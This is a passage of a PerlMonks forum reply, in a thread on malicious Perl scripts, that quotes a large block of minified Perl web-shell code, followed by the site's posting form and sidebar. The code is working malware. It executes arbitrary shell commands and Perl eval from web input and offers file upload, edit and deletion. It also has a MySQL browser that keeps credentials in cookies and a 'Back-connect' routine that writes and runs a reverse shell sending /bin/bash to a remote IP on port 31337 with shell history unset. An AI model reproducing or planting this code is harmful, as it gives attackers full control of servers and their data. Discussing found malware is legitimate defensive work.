\"$CurrentDir\"".$CmdSep.$RunC +ommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($C +ommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |"; +open(CommandOutput, $Command);while(<CommandOutput>){$_=~s/(\n|\r\n)$ +//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}p +rint "</pre>";}ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $pa +th=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;if($RunCo +mmand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand +eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makef +ile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$Run +Command="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq + "unzip"){$RunCommand="tar xfz ".$UnZipArch;}elsif($RunCommand eq "de +lfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$R +unCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my +$tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunComma +nd eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv $p +ath $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttem +pt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ +//g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al +.".".$ar;$RunCommand="touch -t $ttempt $path";}if($RunCommand=~m/^\s* +cd\s+(.+)/){$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep +."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`);&PrintPageHeade +r("c");file_header();print "<font size=1>";$Prompt=$WinNT?"$OldDir> " + : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&Prin +tPageHeader("c");file_header();print "<font size=1>";$Prompt=$WinNT?" +$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCo +mmand<pre>";$Command="cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redire +ctor;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutD +uration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOu +tput, $Command);while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_ +\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "</pre> +";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub S +endFileToBrowser($){open (FILE, $_[0]);local ($/);$file=<FILE>;close +(FILE);($f=$_[0])=~m!([^/^\\]*)$!;print "Content-type: application/x- +unknown\n";print "Content-Disposition: attachment;filename=".$1."\n"; +print "Content-Description: File to download\n\n";print $file;}sub Sy +stemInfo{sub langs{$s="which gcc perl python php tar zip";$s.=" -U $q +{u}"if($q{u});return $s;}sub hdd{$s="df -h";$s.=" -U $q{u}"if($q{u}); +return $s;}sub hdd1{$s="mount";$s.=" -U $q{u}"if($q{u});return $s;}su +b perlv{$s="perl -v";$s.=" -U $q{u}"if($q{u});return $s;}sub phpv{$s= +"php -v";$s.=" -U $q{u}"if($q{u});return $s;}sub hosts{$s="cat /etc/h +osts";$s.=" -U $q{u}"if($q{u});return $s;}sub downloaders{$s="which l +ynx links wget GET fetch curl";$s.=" -U $q{u}"if($q{u});return $s;}su +b httpd{$s="locate httpd.conf";$s.=" -U $q{u}"if($q{u});return $s;}$l +angs=langs();$httpd=httpd();$hdd1=hdd1();$hdd=hdd();$perlv=perlv();$p +hpv=phpv();$hosts=hosts();$downloaders=downloaders();&PrintPageHeader +("c");print "<h1>System information</h1>";print "$div$tab<td><span>HD +D[mount]:</span>$div";P(`$hdd1`);print "$dive</td><td><span>HDD[df -h +]:</span>$div";P(`$hdd`);print "<tr><td><span>PATHS:</span>$div";P(`$ +langs`);print "$dive</td><td><span>DOWNLOADERS:</span>$div";P(`$downl +oaders`);print "$dive</td></tr><tr><td><span>PERL version:</span>$div +";P(`$perlv`);print "$dive</td><td><span>PHP version:</span>$div";P(` +$phpv`);print "$dive</td></tr><tr><td><span>/etc/hosts:</span>$div";P +(`$hosts`);print "$dive</td><td><span>httpd.conf:</span>$div";P(`$htt +pd`);print "$dive</td></tr>$tabe$dive";&PrintPageFooter;}sub sql_logi +nform{print "<h1>DataBases manager</h1>";&GetCookies;$hhost=$Cookies{ +'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Co +okies{'passs'};$dbb=$Cookies{'dbb'};if(!$hhost){$hhost='localhost'};i +f(!$pport){$pport='3306'};if(!$usser){$usser='root'};print <<END; <form name='sf' method='post'><table cellpadding='2' cellspacing='0'>< +tr><td>Type</td><td>Host</td><td>Port</td><td>Login</td><td>Password< +/td><td>Database</td><td></td></tr><tr><td><select name='type' id='nn +ame'><option value='mysql' selected>MySql</option><option value='pgsq +l'>PostgreSql</option></select></td><td><input type=text name=sql_hos +t value=$hhost></td><td><input type=text name=sql_port value=$pport>< +/td><td><input type=text name=sql_login value=$usser></td><td><input +type=text name=sql_pass value=$passs></td><td><input type=text name=s +ql_db value=$dbb></td><input type="hidden" name="d" value="$CurrentDi +r"><input type="hidden" name="a" value="sql_connect"><td><input type= +submit value='>>'></td></tr>$tabe</form><br><script>document.getEleme +ntById('nname').focus();</script> END }sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form( +);&PrintVar;&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'} +;$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass' +};$dbb=$in{'sql_db'};}sub sql_query_form{ print <<END; $tab<td><span>Current query:</span></td><td><form name='querys' method +='post'><textarea name='query' cols=70 style='width:100%;height:60px' +>$zapros</textarea><br/><input type=submit value='Query'><input type= +"hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" v +alue="sql_query"></form></td>$tabe$tabe END }sub sql_cq_form{print <<END; $tab<td><span>Get data from columns:</span></td><td><form name='cquery +s' method='post'><textarea name='cquery' id='cquery' cols=40 style='w +idth:100%;height:60px'></textarea><br/><input type="hidden" name="a" +value="sql_query"><input type="hidden" name="d" value="$CurrentDir">< +input type=submit value='Query'></form></td> END }sub sql_databases_form{print '<tr><form method=post name=dd'.$$ref[0] +.'><input type="hidden" name="a" value="sql_databases"><input type=hi +dden name=database value='.$$ref[0].'><input type="hidden" name="d" v +alue="'.$CurrentDir.'"><td></font><font face="Verdana" size="1">['.$s +4et.']</font></td><td><a href="javascript:document.dd'.$$ref[0].'.sub +mit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td> +</form></tr>';}sub sql_tables_form {print '<tr><form method=post name +=tt'.$$ref[0].'><input type="hidden" name="a" value="sql_tables"><inp +ut type=hidden name=table value='.$$ref[0].'><input type="hidden" nam +e="d" value="'.$CurrentDir.'"><td></font><font face="Verdana" size="1 +">['.$s4et.']</font></td><td><a href="javascript:document.tt'.$$ref[0 +].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></ +a></td></form></tr>';}sub sql_columns_form{print '<script>function lo +l'.$s4et.'(f){if(f.checked){var cn=document.getElementById("cquery"). +value;if(cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{doc +ument.cquerys.cquery.value=f.id;}}else{exit;}}</script><tr><form meth +od=post name=cc'.$$ref[0].'><input type="hidden" name="a" value="sql_ +columns"><input type=hidden name=column value='.$$ref[0].'><input typ +e="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font + face="Verdana" size="1">['.$s4et.']</font></td><td><input type=check +box id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.for +m.c'.$$ref[0].')"></td><td><a href="javascript:document.cc'.$$ref[0]. +'.submit()"><font face="Verdana" size="1">'.$$ref[0].'</font></a></td +></form><tr>';}sub sql_data_form {print '<tr><form method=post name=d +t'.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'">< +td>'.$verd.'['.$s4et.'] </font></td><td>'.$verd.$$ref[0].'</font></td +></form></tr>';}sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPa +geFooter;}sub NetForm {$rip = $ENV{'REMOTE_ADDR'};print <<END; <h1>Back-connect [perl]</h1><br/><form name='nfp' method=post>Server: + <input type='text' name='server' value=$rip> Port: <input type='text +' name='ppport' value=31337><input type="hidden" name="a" value="net_ +go"><input type=submit value='>>'></form><br> END &PrintVar;}sub back{open(FILE,">/tmp/bbc.pl");$bbc='#!/usr/bin/perl us +e IO::Socket;$system="/bin/bash";use Socket;use FileHandle;socket(SOC +KET,PF_INET,SOCK_STREAM,getprotobyname("tcp")) or die print "[-] Unab +le to Resolve Host\n";connect(SOCKET,sockaddr_in("'.$port.'",inet_ato +n("'.$target.'"))) or die print "[-] Unable to Connect Host\n";SOCKET +->autoflush();open(STDIN, ">&SOCKET");open(STDOUT,">&SOCKET");open(ST +DERR,">&SOCKET");system("unset HISTFILE;unset SAVEHIST;echo PPS 3.0 b +ackconnect:;pwd;");system($system);';print FILE $bbc;close(FILE);syst +em("chmod 777 /tmp/bbc.pl;perl /tmp/bbc.pl $target $port");exit;}sub +NetGo{&PrintPageHeader("c");$target=$in{'server'};$port=$in{'ppport'} +;NetForm();back();&PrintPageFooter;}sub EvalCodePrint{&PrintPageHeade +r("p");EvalCodeForm();&PrintPageFooter;}sub EvalCodeForm{print <<END; <h1>Execution PERL-code</h1><form name=pf method=post><textarea name=c +ode class=bigarea id=PerlCode></textarea><input type="hidden" name="a +" value="eval_code"><input type=submit value=Eval style="margin-top:5 +px"> END }sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode=$in{'code'}; +print "<br>Result:<br>";eval $ccode;&PrintPageFooter;}sub EditFilePat +hForm {print <<END; <code><br><form name=pfsd method=post>$Prompt<input type="text" name=p +ath id=edit1_file><input type="hidden" name="a" value="edit_file_path +"><input type="hidden" name="d" value="$CurrentDir"><input type=submi +t value=MakeDir></form></code> END }sub EditFilePath{$fpath="";$fpath=$CurrentDir."/".$ViewF;EditFilePrin +t();}sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPag +eFooter;}sub EditFileForm{open(FILE, $fpath);@file=<FILE>;$fccodde=Ht +mlSpecialChars(join('', @file));print '<h1>File tools:</h1>';&RTP_EDI +T;print <<END; <div class=content><form name=pf11 method=post><textarea name=ccode cl +ass=bigarea id=editfile>$fccodde</textarea><input type="hidden" name= +"a" value="edit_file"><input type=hidden name=path value=$fpath><inpu +t type="hidden" name="d" value="$CurrentDir"><input type=submit value +=Save style="margin-top:5px"></form></div> END &PrintVar;&PrintPageFooter;}sub ViewFile{$fpath=$CurrentDir."/".$ViewF +;&PrintPageHeader("c");open(FILE,$fpath);@file=<FILE>;$fccodde=join(' +',@file);$fccodde=HtmlSpecialChars($fccodde);print '<h1>File tools:</ +h1>';&RTP_EDIT;print decode_base64("PHNjcmlwdD5mdW5jdGlvbiBjb2xvcihjb +2RlKXt2YXIgcz1bXTt2YXIgYz0iJyI7cmV0dXJuIGNvZGUucmVwbGFjZSgvXGIoY2FzZX +xjYXRjaHxjb250aW51ZXxkb3xlbmRkb3xlbHNlfGVsaWZ8ZWxzZWlmfGlmZGVmfGlmbmR +lZnxlbmRpZnxmb3J8Zm9yZWFjaHxpZnxmaXxzd2l0Y2h8dHJ5fHR5cGVvZnx3aGlsZXx3 +aXRofGJyZWFrfGluY2x1ZGV8cmVxdWlyZXxyZXF1aXJlX29uY2V8Zm9wZW58ZnB1dHN8Z +nJlYWR8ZmlsZV9nZXRfY29udGVudHN8ZmlsZV9wdXRfY29udGVudHN8cHJlZ19yZXBsYW +NlfGltcG9ydHxleGNlcHR8ZGVmaW5lfGRlZmluZWR8dW5kZWYpXGIvZ2ltLCc8c3Bhbj4 +kMTwvc3Bhbj4nKS5yZXBsYWNlKC8oe3x9KS9naW0sJzxzcGFuPiQxPC9zcGFuPicpLnJl +cGxhY2UoL1xiKGZ1bmN0aW9ufHN1YnxkZWZ8dm9pZHxpbnR8cmV0dXJufGV2YWx8YXNzZ +XJ0fGV4ZWNsfGV4ZWN2fGV4ZWN2ZXxleGVjfGV4ZWNwfGRpZVwoXCkpXGIvZ2ltLCc8Yj +48Zm9udCBjb2xvcj0jMDBmZmZmPiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC9cYihzdHJ +1Y3R8ZXhpdHxjbGFzc3xzeXN0ZW18cHJpbnR8cHJpbnRmfGVjaG98c3ByaW50ZnxmcHJp +bnRmfHZhclxzKVxiL2dpbSwnPGI+JDE8L2I+JykucmVwbGFjZSgvXGIoMHhbXGRhLXpdK +3xcZCspXGIvZ2ltLCAnPGZvbnQgY29sb3I9I2ZmYTA3YT4kMTwvZm9udD4nKS5yZXBsYW +NlKC8oXFx4W1xkYS16XSopL2dpbSwgJzxmb250IGNvbG9yPSNmZmEwN2E+JDE8L2ZvbnQ ++JykucmVwbGFjZSgvXGIoaHR0cFw6XC9cLypcLz98aHR0cHNcOlwvXC8qXC8/fGZ0cFw6 +XC9cLypcLz8pXGIvZ2ltLCc8dT48Zm9udCBjb2xvcj0jZmFmYWQyPiQxPC91PjwvZm9ud +D4nKS5yZXBsYWNlKC8oIi4qPyJ8Jy4qPycpL2csJzxmb250IGNvbG9yPSNmYWZhZDI+JD +E8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCouKlwqXC98XC9cLy4qKS9naW0sJzxmb250IGN +vbG9yPSM2OTY5Njk+JDE8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCpbXHNcU10qP1wqXC8p +L2dpbSwnPGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD4nKS5yZXBsYWNlKC8oXiMuK +iQpL2dpbSwnPGI+PGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD48L2I+JykucmVwbG +FjZSgvKFwkW19hLXowLTldKikvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jOThmYjk4PiQxPC9 +mb250PjwvYj4nKS5yZXBsYWNlKC88cihcZCspPi9naW0sZnVuY3Rpb24obWF0Y2gsaWQp +e3ZhciByPXNbaWQtMV07dmFyIGNzcz1yLm1hdGNoKC9eKFwvXC98XC9cKnwtKS8pPydjb +21tZW50JzpyLm1hdGNoKC9eWyYnXS8pPydzdHJpbmcnOidyZWdleHAnO3JldHVybiAnPH +NwYW4gY2xhc3M9IicrY3NzKyciPicrcisnPC9zcGFuPic7fSl9O2Z1bmN0aW9uIGNoYW5 +nZVRleHQoKXt2YXIgYT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY2Njb2RlZScpLmlu +bmVySFRNTDthPWNvbG9yKGEpO2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjY2NvZGVlJ +ykuaW5uZXJIVE1MPWE7fTwvc2NyaXB0Pg=="); print"<div class=content><pre class=ml1 id='cccodee'>$fccodde</pre></d +iv>";&PrintVar;&PrintPageFooter;}sub EditFile {&PrintPageHeader("c"); +$fccode=$in{'ccode'};$ffpath=$in{"path"};print <<END; <h1>File: $ffpath saved</h1><form name=pf11 method=post><textarea name +=ccode class=bigarea id=editfile>$fccode</textarea><input type="hidde +n" name="a" value="filemanager"><niput type=hidden name=path value=$f +fpath><input type="hidden" name="ddd" value="$ViewF"><input type="hid +den" name="d" value="$CurrentDir"><input type=submit value=Files styl +e="margin-top:5px"></form> END open(FFF,"> $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF) +;&PrintVar;&PrintPageFooter;}sub jquery{print '<script>document.query +s.query.value="'.$zapros.'";</script>';}sub sql_columns{&GetCookies;$ +hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'uss +er'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'t +able'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$ +in{'column'};print <<END; <script>function setCookie(name,value,expires,path,domain,secure){docu +ment.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"") ++((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)? +";secure":"");}setCookie("column","$column","","/");</script> END print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$us +ser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print +"<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1 +>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();} +$rc=$sth->finish;print "$tabe</td><td>$tab<td>";$zapros="SHOW TABLES +FROM $dbb";sql_cq_form();print "</td><td>";sql_query_form();print "$t +abe</td>$tabe";$s4et=0;$sth=$dbh->prepare($zapros);$sth->execute;prin +t $tabe;print "<b>Tables from $dbb:</b><br><table border=1 cellspacin +g=0 cellpadding=1 cols=4><td><table border=1 cellspacing=0 cellpaddin +g=1 cols=2>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_f +orm();}$rc=$sth->finish;print "$tabe</td><td><table border=1 cellspac +ing=0 cellpadding=1 cols=2>";$s4et=0;$sth=$dbh->prepare("show columns + from $table from $dbb");$sth->execute;while($ref=$sth->fetchrow_arra +yref){$s4et++;sql_columns_form();}$rc=$sth->finish;print "$tabe</td>" +;$s4et=0;$zapros="SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0 +,30";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print "<td><t +able border=1 cellspacing=0 cellpadding=1 cols=2>";while($ref=$sth->f +etchrow_arrayref){$s4et++;sql_data_form();}$rc=$sth->finish;$rc=$dbh- +>disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql_tables{ +&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser= +$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&Prin +tPageHeader("c");sql_vars_set();sql_loginform();$qqquery=$in{'table'} +;print <<END; <script>function setCookie(name,value,expires,path,domain,secure){docu +ment.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"") ++((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)? +";secure":"");}setCookie("table","$qqquery","","/");</script> END print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$us +ser,$passs);$sth=$dbh->prepare('SHOW DATABASES');$sth->execute;print +"<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1 +>";jquery();while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases +_form();}$rc=$sth->finish;print "$tabe</td><td>$tab<td>";sql_cq_form( +);print "</td><td>";sql_query_form();print "</td>$tabe</td>$tabe";$s4 +et=0;$sth=$dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print +"<b>Tables from $dbb:</b><br><table border=1 cellspacing=0 cellpaddin +g=1 cols=4><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";w +hile($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$st +h->finish;print "$tabe</td><td><table border=1 cellspacing=0 cellpadd +ing=1 cols=2>";$s4et=0;$zapros="SHOW COLUMNS FROM `$qqquery` FROM `$d +bb`";jquery();$sth=$dbh->prepare($zapros);$sth->execute;while($ref=$s +th->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;$ +rc=$dbh->disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql +_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_lo +ginform();$ddb=$in{'database'};print <<END; <script>function setCookie(name,value,expires,path,domain,secure){docu +ment.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"") ++((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)? +";secure":"");}setCookie("dbb","$ddb","","/");</script> END print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$us +ser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;prin +t "<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding +=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form() +;}$rc=$sth->finish;print "$tabe</td><td>$tbb>";sql_query_form();print + "$tabe</td>$tabe";$s4et=0;$zapros="SHOW TABLES FROM `$ddb`";jquery() +;$sth=$dbh->prepare($zapros);$sth->execute;print "$tabe";print "<b>Ta +bles from $ddb:</b><br>";print "<table border=1 cellspacing=0 cellpad +ding=1 cols=10>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tabl +es_form();}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe +";&PrintVar;&PrintPageFooter;}sub sql_set_cookie{print "Set-Cookie: h +host=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie +: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Coo +kie: dbb=$dbb;\n";}sub sql_query{sql_vars_set();&GetCookies;$hhost=$C +ookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$pa +sss=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};& +PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cque +ry'};if($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`. +`$table` LIMIT 0,30";}else{$qquery=$in{'query'};}$dbh=DBI->connect("D +BI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW +DATABASES");$sth->execute;print "$verd<table width=100% cellspacing=0 + cellpadding=1 cols=2><b>DATABASES:</b><td><table border=1 cellspacin +g=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_d +atabases_form();}$rc=$sth->finish;print "$tabe</td><td>$tbb>";sql_que +ry_form();print "$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare($qquery) +;$sth->execute;print "<b>Results:</b><br>";print "<table border=1 cel +lspacing=0 cellpadding=1 cols=10>";while($ref=$sth->fetchrow_arrayref +){$s4et++;print "<tr><td>$verd [$s4et]</font></td><td>".$verd.$$ref[0 +]."</font></td></tr>";}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect; +print "$tabe";print '<script>document.querys.query.value="'.$qquery.' +";</script>';&PrintVar;&PrintPageFooter;}sub sql_connect{sql_vars_set +();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_se +t();$s4et=0;$dbb="";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport", +$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros="SHOW + DATABASES";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print +"$verd $tbb<b>DATABASES:</b><td><table border=1 cellspacing=0 cellpad +ding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_fo +rm();}$rc=$sth->finish;print "$tabe</td><td>";sql_query_form();print +"</td>$tabe";$rc = $dbh->disconnect;print '</font>';return;}print "So +me error...</font>";&PrintVar;&PrintPageFooter;}sub UploadFile{if($Tr +ansferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLi +neInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageH +eader("c");file_header();print "<font size=1>Uploading $TransferFile +to $CurrentDir...<br>";chop($TargetName) if($TargetName = $CurrentDir +) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathS +ep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, " +>$TargetName")){binmode(UPLOADFILE) if $WinNT;print UPLOADFILE $in{'f +iledata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.< +br>";print "File Path: $TargetName<br>";}else{print "Failed: $!<br>"; +}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub Rem +ove{use Cwd qw(abs_path);my $path=abs_path($0);system("rm $path");}&R +eadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName= +$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};$RunCommand=$in{'c'};$Run +Command2=$in{'l11'};if($RunCommand2){$RunCommand=$RunCommand2}$RunCom +mand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}$RunCo +mmand2=$in{'group'};if($RunCommand2){$gr=$Cookies{'f'};$gre='';$gr=~s +/\%([A-Fa-f0-9]{2})/pack('C',hex($1))/seg;@grr=split(/\s/,$gr);if($Ru +nCommand2 eq "untar"){foreach $arg(@grr){if($arg ne '..'){$gre.="tar +xfz $arg;"}}}if($RunCommand2 eq "tar"){foreach $arg(@grr){if($arg ne +'..'){$arg1.=' '.$arg}}$gre="tar cfz z_$$.tar.gz".$arg1;}if($RunComma +nd2 eq "delete"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg} +}$gre="rm -rf$arg1";}$RunCommand=$gre;}$ChangeDir=$in{'cc'};$ZipFile= +$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$Del +File=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$ +in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'m +f'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action +="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDi +r=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq +$Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($ +Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}els +if($Action eq "view_file"){&ViewFile;}elsif($Action eq "command1"){&E +xecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($ +Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile +;}elsif($Action eq "download"){&SendFileToBrowser($CurrentDir."/".$Tr +ansferFile);}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Actio +n eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode; +}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo +;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_ +connect;}elsif($Action eq "sql_query"){&sql_query;}elsif($Action eq " +remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Act +ion eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databas +es"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsi +f($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){ +&PerformLogout;}


In reply to Re^2: Malicious Perl Scripts & Web Development by webdev419
in thread Malicious Perl Scripts & Web Development by Anonymous Monk

Title:
Use:  <p> text here (a paragraph) </p>
and:  <code> code here </code>
to format your post; it's "PerlMonks-approved HTML":



  • Are you posting in the right place? Check out Where do I post X? to know for sure.
  • Posts may use any of the Perl Monks Approved HTML tags. Currently these include the following:
    <code> <a> <b> <big> <blockquote> <br /> <dd> <dl> <dt> <em> <font> <h1> <h2> <h3> <h4> <h5> <h6> <hr /> <i> <li> <nbsp> <ol> <p> <small> <strike> <strong> <sub> <sup> <table> <td> <th> <tr> <tt> <u> <ul>
  • Snippets of code should be wrapped in <code> tags not <pre> tags. In fact, <pre> tags should generally be avoided. If they must be used, extreme care should be taken to ensure that their contents do not have long lines (<70 chars), in order to prevent horizontal scrolling (and possible janitor intervention).
  • Want more info? How to link or or How to display code and escape characters are good places to start.
Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others exploiting the Monastery: (2)
As of 2022-09-26 22:16 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?
    I prefer my indexes to start at:




    Results (118 votes). Check out past polls.

    Notices?